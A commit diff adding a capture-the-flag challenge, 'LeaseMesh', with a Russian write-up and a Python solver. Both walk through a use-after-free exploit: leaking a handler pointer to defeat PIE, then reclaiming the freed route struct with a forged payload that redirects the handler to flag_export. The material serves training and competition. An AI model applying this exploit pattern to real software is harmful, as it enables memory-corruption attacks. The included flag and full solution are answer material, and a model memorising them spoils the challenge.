Init. Commit

This commit is contained in:
Caplag
2026-09-17 00:50:07 +03:00
commit 880d8698d6
115 changed files with 7611 additions and 0 deletions
@@ -0,0 +1,52 @@
<h1 align="center">LeaseMesh</h1>
<p align="center">
<img src="https://img.shields.io/badge/category-PWN-blueviolet" alt="PWN"/>
<img src="https://img.shields.io/badge/difficulty-medium-orange" alt="medium"/>
</p>
LeaseMesh позволяет создавать, просматривать, закрывать и пересылать «аренды» маршрутов. В раздатке есть ELF `lease-mesh` с PIE и сохранёнными символами. Для получения флага нужно узнать адрес `flag_export` и подменить обработчик маршрута.
## Решение
У маршрута размер 144 байта. Для атаки важны следующие поля:
| Смещение | Поле | Назначение |
|---:|---|---|
| 0 | `magic`, 8 байт | `0x4c454153454d4553` |
| 8 | `name[24]` | Имя маршрута |
| 32 | `generation`, 8 байт | Поколение объекта |
| 40 | `handler`, 8 байт | Указатель на обработчик |
| 48 | `approved`, 4 байта | Для экспорта нужно `0x51524f4b` |
| 52 | `memo_len`, 4 байта | Длина заметки |
| 56 | `memo[88]` | Сама заметка |
Открываем маршрут в слоте `0` через `1) open route lease`, имя и заметка любые. В пункте `4) inspect route` выбираем слот `0`. Из `handler=%p` получаем адрес `route_status` в запущенном процессе и сохраняем его числом в `leaked_handler`. Через `readelf -sW public/lease-mesh` находим значения символов `route_status` и `flag_export`. Смещения относительно базы PIE обозначим `offset_route_status` и `offset_flag_export`. Вычитаем первое из утечки и прибавляем второе:
```python
pie_base = leaked_handler - offset_route_status
target = pie_base + offset_flag_export
```
Теперь освобождаем маршрут через `2) close route lease`, указывая слот `0`. В `close_route` есть `free(routes[idx])`, но нет обнуления `routes[idx]`. Значит, слот продолжает ссылаться на освобождённую память.
Пункт `3) import raw decoder packet` выделяет ровно `sizeof(struct route)` и заполняет блок переданными байтами. Собираем подделку:
```python
import struct
payload = struct.pack("<Q", 0x4c454153454d4553)
payload += b"export-reclaim".ljust(24, b"\x00")
payload += struct.pack("<QQII", 0x2605061337, target, 0x51524f4b, 0)
payload = payload.ljust(144, b"\x00")
```
Выбираем `3) import raw decoder packet`. На запрос `raw packet bytes:` отправляем строку `144`, затем на `packet payload:` передаём 144 байта payload без добавленного перевода строки.
После переиспользования блока `routes[0]` указывает на этот пакет как на настоящий маршрут. Вызываем `5) dispatch route`, слот `0`. Поля `magic` и `approved` содержат ожидаемые значения, а `handler` указывает на `flag_export`.
[Солвер](solve/solve.py).
## Флаг
`caplag{stale_handle_reclaimed_the_route}`
@@ -0,0 +1,131 @@
#!/usr/bin/env python3
import argparse
import os
import socket
import struct
import subprocess
import sys
ROUTE_MAGIC = 0x4C454153454D4553
APPROVED_ROUTE = 0x51524F4B
ROUTE_SIZE = 144
class Tube:
def __init__(self, sock=None, proc=None):
self.sock = sock
self.proc = proc
def recv(self, n=4096):
if self.sock:
return self.sock.recv(n)
return os.read(self.proc.stdout.fileno(), n)
def send(self, data):
if self.sock:
self.sock.sendall(data)
else:
os.write(self.proc.stdin.fileno(), data)
def sendline(self, data):
self.send(data + b"\n")
def recvuntil(self, marker):
out = b""
while marker not in out:
chunk = self.recv(1)
if not chunk:
raise EOFError(out)
out += chunk
return out
def symbol_value(binary, name):
out = subprocess.check_output(["readelf", "-sW", binary], text=True)
for line in out.splitlines():
fields = line.split()
if len(fields) >= 8 and fields[-1] == name:
return int(fields[1], 16)
raise RuntimeError(f"symbol not found: {name}")
def connect(args):
if args.local:
env = os.environ.copy()
env["CTF_FLAG"] = args.flag
proc = subprocess.Popen(
[args.binary],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
env=env,
)
return Tube(proc=proc)
sock = socket.create_connection((args.host, args.port), timeout=5)
return Tube(sock=sock)
def choose(io, value):
io.recvuntil(b">")
io.sendline(str(value).encode())
def main():
parser = argparse.ArgumentParser()
parser.add_argument("--host", default="127.0.0.1")
parser.add_argument("--port", type=int, default=31338)
parser.add_argument("--local", action="store_true")
parser.add_argument("--binary", default="../public/lease-mesh")
parser.add_argument("--flag", default="caplag{stale_handle_reclaimed_the_route}")
args = parser.parse_args()
route_status = symbol_value(args.binary, "route_status")
flag_export = symbol_value(args.binary, "flag_export")
io = connect(args)
choose(io, 1)
io.recvuntil(b"slot:")
io.sendline(b"0")
io.recvuntil(b"name:")
io.sendline(b"east-mirror")
io.recvuntil(b"memo:")
io.sendline(b"leased partner route")
choose(io, 4)
io.recvuntil(b"slot:")
io.sendline(b"0")
io.recvuntil(b"handler=")
leaked_handler = int(io.recvuntil(b" approved=")[: -len(b" approved=")], 16)
pie_base = leaked_handler - route_status
target = pie_base + flag_export
choose(io, 2)
io.recvuntil(b"slot:")
io.sendline(b"0")
forged = struct.pack("<Q", ROUTE_MAGIC)
forged += b"export-reclaim".ljust(24, b"\x00")
forged += struct.pack("<Q", 0x2605061337)
forged += struct.pack("<Q", target)
forged += struct.pack("<I", APPROVED_ROUTE)
forged += struct.pack("<I", 0)
forged += b"raw packet reclaimed stale route".ljust(88, b"\x00")
forged = forged.ljust(ROUTE_SIZE, b"\x00")
choose(io, 3)
io.recvuntil(b"raw packet bytes:")
io.sendline(str(len(forged)).encode())
io.recvuntil(b"packet payload:")
io.send(forged)
choose(io, 5)
io.recvuntil(b"slot:")
io.sendline(b"0")
data = io.recvuntil(b"}")
flag = data[data.rfind(b"caplag{") :].decode()
print(flag)
if __name__ == "__main__":
sys.exit(main())